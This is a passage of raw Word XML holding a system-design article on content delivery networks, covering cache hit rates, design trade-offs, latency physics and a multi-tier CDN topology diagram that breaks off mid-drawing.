    <w:p w14:paraId="29C8E894" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Hit rate = HIT requests / total requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8F450B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Impact: 95% hit rate = 20x origin bandwidth reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62587137" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">          99% hit rate = 100x origin bandwidth reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC29FD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E3B509" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Improved by: longer TTLs, content-addressed URLs, query normalization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA50A49" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">               surrogate key invalidation, request collapsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35888190" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Damaged by:  Vary: Cookie, over-keying, too-short TTLs, excessive personalization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DF52A5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="22725BE9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The Fundamental Design Tensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CB690" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Cache duration   ↔  Content freshness (longer TTL = better performance, staler content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C347FA3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Cache granularity ↔  Hit rate (more Vary dimensions = more correct, lower hit rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35117B70" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Security depth   ↔  Latency (WAF inspection, bot challenges add processing time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB94ED3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Origin protection ↔  Cache freshness (shield improves protection, adds one cache hop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3211FE5F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Personalization  ↔  Cacheability (personalized responses can't be shared across users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775856F4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a CDN is not infrastructure that sits in front of your application — it is a fundamental architectural component that changes what is possible.</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Without a CDN, you are constrained by the speed of light, the capacity of your origin, and your ability to absorb attacks. With a CDN, you can serve users globally at single-digit millisecond latency, handle traffic spikes orders of magnitude beyond your origin's capacity, and absorb DDoS attacks that would instantly destroy unprotected infrastructure. The engineering decisions that matter most are not CDN vendor selection or configuration syntax — they are </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>what you cache, for how long, at what granularity, and how you invalidate it when it changes.</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> These decisions determine your hit rate, and your hit rate determines almost everything else: origin load, user latency, infrastructure cost, and resilience to failures. A system with 99% CDN cache hit rate is fundamentally different — in performance, cost, and reliability — from the same system with 70% hit rate. The gap between 70% and 99% is closed almost entirely through thoughtful cache key design, appropriate TTL selection, content-addressed URLs for versioned assets, and disciplined Cache-Control header usage at the origin. These are application-layer decisions, not infrastructure decisions — which is why CDN optimization is ultimately a software engineering problem, not just a networking one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30330C24" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00487CAD" w:rsidRDefault="00784ED6" w:rsidP="00487CAD"/>
    <w:p w14:paraId="64BBF8C5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN (Content Delivery Network) in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4381F9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What a CDN Really Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADDF038" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>A Content Delivery Network is a globally distributed system of proxy servers and data centers that caches and serves content from locations geographically closer to end users, reducing latency, offloading origin server bandwidth, and improving availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F55681E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The deeper truth:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> A CDN is not just "caching at the edge." It's a complete content delivery infrastructure that encompasses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A87FD39" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>A globally distributed caching layer (the most visible function).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0A41A2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>A traffic routing system (DNS + anycast to direct users to optimal edges).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84BA18" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>A network backbone (private fiber connecting PoPs, bypassing congested public Internet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E4072E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>A security perimeter (DDoS mitigation, WAF, bot management at the edge).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F44F19" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>A compute platform (edge functions that execute logic at 300+ locations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B2E53" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1233"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>An optimization engine (image compression, protocol negotiation, connection management).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D017E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental problem CDN solves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AF025D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The speed of light in fiber is ~200,000 km/s. New York to Tokyo is ~10,800 km. Minimum round-trip time (RTT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA571E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BECEF9E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>RTT = 2 × distance / speed_of_light_in_fiber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB16972" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>RTT = 2 × 10,800 / 200,000 = 108ms (theoretical minimum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60272DBA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Real-world: ~150–200ms (routing inefficiencies, switching delays)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A122763" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>For an HTTP page load requiring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057DF39C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1234"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>1 RTT for DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF757B3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1234"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>1 RTT for TCP handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEC586C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1234"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>2 RTTs for TLS 1.2 (1 RTT for TLS 1.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080924BE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1234"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>1 RTT for HTTP request/response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D34A17" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1234"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>N RTTs for dependent resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CE2F9F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without CDN:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> 5+ RTTs × 200ms = 1000ms+ before first meaningful content. </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With CDN (edge 5ms away):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> 5+ RTTs × 5ms = 25ms — a 40x improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E05A361" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No amount of server optimization can overcome physics.</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> You cannot make New York closer to Tokyo. The only solution is to put the content itself in Tokyo. That's what a CDN does.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1959980F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="36B5055E">
          <v:rect id="_x0000_i4683" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2B3D6F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. CDN Architecture — The Complete Picture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE097D4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 The Multi-Layer Topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292D64F4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D869C50" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">                         ┌─────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40278154" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                         │    Origin Server     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46994C4E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">                         │  (your infrastructure) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02112F8C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">                         └──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6859ADDA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F738A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">                    (origin pull — only on cache miss from shield)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B062D3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACC35DC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">                         ┌──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573B007A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">                         │  Origin Shield       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8E3412" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">                         │  (1–3 regional nodes)│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237051A9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">                         └──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F97FF0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CADCEDD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">              ┌─────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E5C25C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">              │                     │                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035E279B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    ┌─────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────┐</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>┌────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────┐</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>┌───────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E22132A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    │  Regional PoP   │   │  Regional PoP   │   │  Regional PoP  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C461265" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    │  (Tier 2)       │   │  (Tier 2)       │   │  (Tier 2)      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C61E3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    └────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>└────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>└────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62844051" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
